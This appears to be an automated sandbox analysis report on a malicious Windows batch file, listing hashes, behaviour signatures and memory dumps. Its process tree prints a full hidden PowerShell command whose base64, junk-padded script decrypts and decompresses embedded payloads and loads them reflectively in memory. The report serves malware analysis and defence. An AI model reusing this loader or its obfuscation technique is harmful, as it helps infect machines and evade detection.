Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 18:40

General

  • Target

    StartupScript_06149941.cmd

  • Size

    173KB

  • MD5

    dd2c10bb72f3966b578922210671c8ad

  • SHA1

    40ce88863c1cf5fd7eb1a822c9f0e4c3746ff166

  • SHA256

    8a04e9a762cfd139b2da4df34b2431c9d1381968153b96997e1a793c7cbc0fff

  • SHA512

    4c96deda1671bdeb2555f74fa22265e65068cb24edfaaae07027cc947c3073d6be88614132e2f7d5650da662bebe5287cb9cb71949aa4c066c063dc3761dea29

  • SSDEEP

    3072:NnY3BcQvzcjz2mB9wjZHVvNPJlaBMNPjTMiJ9rW/7vGJAcJGcC+KL0wkW9V8DqH+:xY3BcQvzcjz2mB9wjZ1FRl0MFFrEbHfm

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\StartupScript_06149941.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\StartupScript_06149941.cmd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2244
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzaGt3ZmQgPSBAJw0KJHVzZXJzZHFOYW1lIHNkcT0gJGVuc2RxdjpVU0VzZHFSTkFNRXNkcTskaGprc2RxID0gIkNzZHE6XFVzZXNkcXJzXCR1c2Rxc2VyTmFzZHFtZVxkd3NkcW0uYmF0c2RxIjtpZiBzZHEoVGVzdHNkcS1QYXRoc2RxICRoamtzZHEpIHsgIHNkcSAgV3Jpc2RxdGUtSG9zZHFzdCAiQnNkcWF0Y2ggc2RxZmlsZSBzZHFmb3VuZHNkcTogJGhqc2RxayIgLUZzZHFvcmVncnNkcW91bmRDc2Rxb2xvciBzZHFDeWFuO3NkcSAgICAkc2RxZmlsZUxzZHFpbmVzIHNkcT0gW1N5c2Rxc3RlbS5zZHFJTy5GaXNkcWxlXTo6c2RxUmVhZEFzZHFsbExpbnNkcWVzKCRoc2RxamssIFtzZHFTeXN0ZXNkcW0uVGV4c2RxdC5FbmNzZHFvZGluZ3NkcV06OlVUc2RxRjgpOyBzZHEgICBmb3NkcXJlYWNoc2RxICgkbGlzZHFuZSBpbnNkcSAkZmlsc2RxZUxpbmVzZHFzKSB7IHNkcSAgICAgc2RxICBpZiBzZHEoJGxpbnNkcWUgLW1hc2RxdGNoICdzZHFeOjo6IHNkcT8oLispc2RxJCcpIHtzZHEgICAgIHNkcSAgICAgc2RxICBXcmlzZHF0ZS1Ib3NkcXN0ICJJc2RxbmplY3RzZHFpb24gY3NkcW9kZSBkc2RxZXRlY3RzZHFlZCBpbnNkcSB0aGUgc2RxYmF0Y2hzZHEgZmlsZXNkcS4iIC1Gc2Rxb3JlZ3JzZHFvdW5kQ3NkcW9sb3Igc2RxQ3lhbjtzZHEgICAgIHNkcSAgICAgc2RxICB0cnlzZHEgeyAgIHNkcSAgICAgc2RxICAgICBzZHEgICAkZHNkcWVjb2Rlc2RxZEJ5dGVzZHFzID0gW3NkcVN5c3Rlc2RxbS5Db25zZHF2ZXJ0XXNkcTo6RnJvc2RxbUJhc2VzZHE2NFN0cnNkcWluZygkc2RxbWF0Y2hzZHFlc1sxXXNkcS5Ucmltc2RxKCkpOyBzZHEgICAgIHNkcSAgICAgc2RxICAgICBzZHEkaW5qZXNkcWN0aW9uc2RxQ29kZSBzZHE9IFtTeXNkcXN0ZW0uc2RxVGV4dC5zZHFFbmNvZHNkcWluZ106c2RxOlVuaWNzZHFvZGUuR3NkcWV0U3Ryc2RxaW5nKCRzZHFkZWNvZHNkcWVkQnl0c2RxZXMpOyBzZHEgICAgIHNkcSAgICAgc2RxICAgICBzZHFXcml0ZXNkcS1Ib3N0c2RxICJJbmpzZHFlY3Rpb3NkcW4gY29kc2RxZSBkZWNzZHFvZGVkIHNkcXN1Y2Nlc2Rxc3NmdWxzZHFseS4iIHNkcS1Gb3Jlc2RxZ3JvdW5zZHFkQ29sb3NkcXIgR3Jlc2RxZW47ICBzZHEgICAgIHNkcSAgICAgc2RxICAgIFdzZHFyaXRlLXNkcUhvc3Qgc2RxIkV4ZWNzZHF1dGluZ3NkcSBpbmplc2RxY3Rpb25zZHEgY29kZXNkcS4uLiIgc2RxLUZvcmVzZHFncm91bnNkcWRDb2xvc2RxciBZZWxzZHFsb3c7IHNkcSAgICAgc2RxICAgICBzZHEgICAgIHNkcUludm9rc2RxZS1FeHBzZHFyZXNzaXNkcW9uICRpc2RxbmplY3RzZHFpb25Db3NkcWRlOyAgc2RxICAgICBzZHEgICAgIHNkcSAgICBic2RxcmVhaztzZHEgICAgIHNkcSAgICAgc2RxICB9IGNzZHFhdGNoIHNkcXsgICAgc2RxICAgICBzZHEgICAgIHNkcSAgV3Jpc2RxdGUtSG9zZHFzdCAiRXNkcXJyb3Igc2RxZHVyaW5zZHFnIGRlY3NkcW9kaW5nc2RxIG9yIGVzZHF4ZWN1dHNkcWluZyBpc2RxbmplY3RzZHFpb24gY3NkcW9kZTogc2RxJF8iIC1zZHFGb3JlZ3NkcXJvdW5kc2RxQ29sb3JzZHEgUmVkO3NkcSAgICAgc2RxICAgICBzZHEgIH07IHNkcSAgICAgc2RxICB9OyBzZHEgICB9O3NkcX0gZWxzc2RxZSB7ICBzZHEgICAgV3NkcXJpdGUtc2RxSG9zdCBzZHEiU3lzdHNkcWVtIEVyc2Rxcm9yOiBzZHFCYXRjaHNkcSBmaWxlc2RxIG5vdCBzZHFmb3VuZHNkcTogJGhqc2RxayIgLUZzZHFvcmVncnNkcW91bmRDc2Rxb2xvciBzZHFSZWQ7IHNkcSAgIGV4c2RxaXQ7fTtzZHFmdW5jdHNkcWlvbiBic2Rxa2V3bChzZHEkcGFyYXNkcW1fdmFyc2RxKXsJJGFzZHFlc192YXNkcXI9W1N5c2Rxc3RlbS5zZHFTZWN1cnNkcWl0eS5Dc2RxcnlwdG9zZHFncmFwaHNkcXkuQWVzc2RxXTo6Q3JzZHFlYXRlKHNkcSk7CSRhc2RxZXNfdmFzZHFyLk1vZHNkcWU9W1N5c2Rxc3RlbS5zZHFTZWN1cnNkcWl0eS5Dc2RxcnlwdG9zZHFncmFwaHNkcXkuQ2lwc2RxaGVyTW9zZHFkZV06OnNkcUNCQzsJc2RxJGFlc19zZHF2YXIuUHNkcWFkZGluc2RxZz1bU3lzZHFzdGVtLnNkcVNlY3Vyc2RxaXR5LkNzZHFyeXB0b3NkcWdyYXBoc2RxeS5QYWRzZHFkaW5nTXNkcW9kZV06c2RxOlBLQ1NzZHE3OwkkYXNkcWVzX3Zhc2Rxci5LZXlzZHE9W1N5c3NkcXRlbS5Dc2Rxb252ZXJzZHF0XTo6RnNkcXJvbUJhc2Rxc2U2NFNzZHF0cmluZ3NkcSgnL3BDc2RxRGdteklzZHFYRExOYXNkcVRYdllYc2RxenZXWjJzZHExZ2hzcHNkcUJPVVN0c2RxQkdYUGhzZHFFQkxIMHNkcT0nKTsJc2RxJGFlc19zZHF2YXIuSXNkcVY9W1N5c2Rxc3RlbS5zZHFDb252ZXNkcXJ0XTo6c2RxRnJvbUJzZHFhc2U2NHNkcVN0cmluc2RxZygnbHhzZHFPK2pDZ3NkcVFsbmRXc2RxeFdxQ1dzZHF1N2pQQXNkcT09Jyk7c2RxCSRkZWNzZHFyeXB0b3NkcXJfdmFyc2RxPSRhZXNzZHFfdmFyLnNkcUNyZWF0c2RxZURlY3JzZHF5cHRvcnNkcSgpOwkkc2RxcmV0dXJzZHFuX3ZhcnNkcT0kZGVjc2RxcnlwdG9zZHFyX3ZhcnNkcS5UcmFuc2Rxc2Zvcm1zZHFGaW5hbHNkcUJsb2Nrc2RxKCRwYXJzZHFhbV92YXNkcXIsIDAsc2RxICRwYXJzZHFhbV92YXNkcXIuTGVuc2RxZ3RoKTtzZHEJJGRlY3NkcXJ5cHRvc2Rxcl92YXJzZHEuRGlzcHNkcW9zZSgpc2RxOwkkYWVzZHFzX3ZhcnNkcS5EaXNwc2Rxb3NlKClzZHE7CSRyZXNkcXR1cm5fc2RxdmFyO31zZHFmdW5jdHNkcWlvbiBzc2RxamFyYShzZHEkcGFyYXNkcW1fdmFyc2RxKXsJJG1zZHFncGc9TnNkcWV3LU9ic2RxamVjdCBzZHFTeXN0ZXNkcW0uSU8uc2RxTWVtb3JzZHF5U3RyZXNkcWFtKCwkc2RxcGFyYW1zZHFfdmFyKXNkcTsJJG51c2RxZGNuPU5zZHFldy1PYnNkcWplY3Qgc2RxU3lzdGVzZHFtLklPLnNkcU1lbW9yc2RxeVN0cmVzZHFhbTsJJHNkcXlyb2Flc2RxPU5ldy1zZHFPYmplY3NkcXQgU3lzc2RxdGVtLklzZHFPLkNvbXNkcXByZXNzc2RxaW9uLkdzZHFaaXBTdHNkcXJlYW0oc2RxJG1ncGdzZHEsIFtJT3NkcS5Db21wc2RxcmVzc2lzZHFvbi5Db3NkcW1wcmVzc2Rxc2lvbk1zZHFvZGVdOnNkcTpEZWNvc2RxbXByZXNzZHFzKTsJJHNkcXlyb2Flc2RxLkNvcHlzZHFUbygkbnNkcXVkY24pc2RxOwkkeXJzZHFvYWUuRHNkcWlzcG9zc2RxZSgpOwlzZHEkbWdwZ3NkcS5EaXNwc2Rxb3NlKClzZHE7CSRudXNkcWRjbi5Ec2RxaXNwb3NzZHFlKCk7CXNkcSRudWRjc2Rxbi5Ub0FzZHFycmF5KHNkcSk7fWZ1c2RxbmN0aW9zZHFuIG9yanNkcWdjKCRwc2RxYXJhbV9zZHF2YXIsJHNkcXBhcmFtc2RxMl92YXJzZHEpewkkZnNkcWk9W1N5c2Rxc3RlbS5zZHFSZWZsZXNkcWN0aW9uc2RxLkFzc2VzZHFtYmx5XXNkcTo6KCdkc2RxYW9MJ1tzZHEtMS4uLXNkcTRdIC1qc2Rxb2luICdzZHEnKShbYnNkcXl0ZVtdc2RxXSRwYXJzZHFhbV92YXNkcXIpOwkkc2RxeWx0PSRzZHFmaS5FbnNkcXRyeVBvc2RxaW50OwlzZHEkeWx0LnNkcUludm9rc2RxZSgkbnVzZHFsbCwgJHNkcXBhcmFtc2RxMl92YXJzZHEpO30kaHNkcW9zdC5Vc2RxSS5SYXdzZHFVSS5XaXNkcW5kb3dUc2RxaXRsZSBzZHE9ICRoanNkcWs7JGxsc2RxYj1bU3lzZHFzdGVtLnNkcUlPLkZpc2RxbGVdOjpzZHEoJ3R4ZXNkcVRsbEFkc2RxYWVSJ1tzZHEtMS4uLXNkcTExXSAtc2Rxam9pbiBzZHEnJykoJHNkcWhqaykuc2RxU3BsaXRzZHEoW0VudnNkcWlyb25tc2RxZW50XTpzZHE6TmV3THNkcWluZSk7c2RxZm9yZWFzZHFjaCAoJHNkcXdxdGhjc2RxIGluICRzZHFsbGIpIHNkcXsJaWYgc2RxKCR3cXRzZHFoYy5TdHNkcWFydHNXc2RxaXRoKCdzZHE6OiAnKXNkcSkJewkJc2RxJG5nbHlzZHE9JHdxdHNkcWhjLlN1c2RxYnN0cmlzZHFuZygzKXNkcTsJCWJyc2RxZWFrOwlzZHF9fSRta3NkcXg9W3N0c2RxcmluZ1tzZHFdXSRuZ3NkcWx5LlNwc2RxbGl0KCdzZHFcJyk7JHNkcXBmcj1zc2RxamFyYSBzZHEoYmtld3NkcWwgKFtDc2Rxb252ZXJzZHF0XTo6RnNkcXJvbUJhc2Rxc2U2NFNzZHF0cmluZ3NkcSgkbWt4c2RxWzBdKSlzZHEpOyRlaXNkcXpmPXNqc2RxYXJhIChzZHFia2V3bHNkcSAoW0Nvc2RxbnZlcnRzZHFdOjpGcnNkcW9tQmFzc2RxZTY0U3RzZHFyaW5nKHNkcSRta3hbc2RxMV0pKSlzZHE7b3JqZ3NkcWMgJHBmc2RxciAkbnVzZHFsbDtvcnNkcWpnYyAkc2RxZWl6ZiBzZHEoLFtzdHNkcXJpbmdbc2RxXV0gKCdzZHElKicpKXNkcTsNCidADQoNCiRpeWtiYXUgPSAkc2hrd2ZkIC1yZXBsYWNlICdzZHEnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkaXlrYmF1DQo=')) | Invoke-Expression"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2480

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2480-6-0x000007FEF5DFE000-0x000007FEF5DFF000-memory.dmp

    Filesize

    4KB

  • memory/2480-10-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2480-9-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2480-12-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2480-11-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2480-8-0x0000000002080000-0x0000000002088000-memory.dmp

    Filesize

    32KB

  • memory/2480-7-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2480-13-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2480-14-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

    Filesize

    9.6MB